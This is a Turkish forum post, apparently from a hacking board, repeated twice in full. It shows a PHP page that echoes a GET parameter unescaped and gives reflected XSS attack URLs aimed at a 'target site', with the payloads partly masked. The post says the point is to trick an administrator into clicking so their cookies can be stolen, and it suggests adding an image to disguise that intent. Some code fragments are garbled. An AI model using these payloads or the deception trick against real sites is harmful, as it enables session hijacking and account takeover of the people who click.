Arkadaşlar tekrardan......xxx.org da xxxxxx.php diye bir dosya olsun
kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
?>
xss acıgını yaratan hasarlı kod :
echo ($_GET[name_1])
böyle bir kodla karşıştık diyelim:
http://hedefsiteadresi.com/xxxxxx.php?name_1=********>alert1;</script>
Site mysql ile çalışan bir database’li sistemse, admin’e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
xxxxxx.php su kodlar olsun :
here $_GET[’Exploit
saldırılacak sekıl:
http://www.xxx.org/xxxxxx.php?Exploit=********>alert1;</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
bu kadar... bilgi paylastıkca buyur...
kod:
<form action="star.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo ($_GET[name_1]);
?>
xss acıgını yaratan hasarlı kod :
echo ($_GET[name_1])
böyle bir kodla karşıştık diyelim:
http://hedefsiteadresi.com/xxxxxx.php?name_1=********>alert1;</script>
Site mysql ile çalışan bir database’li sistemse, admin’e bir şekilde tıklattırarak cookie alınabilir.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
xxxxxx.php su kodlar olsun :
here $_GET[’Exploit
saldırılacak sekıl:
http://www.xxx.org/xxxxxx.php?Exploit=********>alert1;</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
bu kadar... bilgi paylastıkca buyur...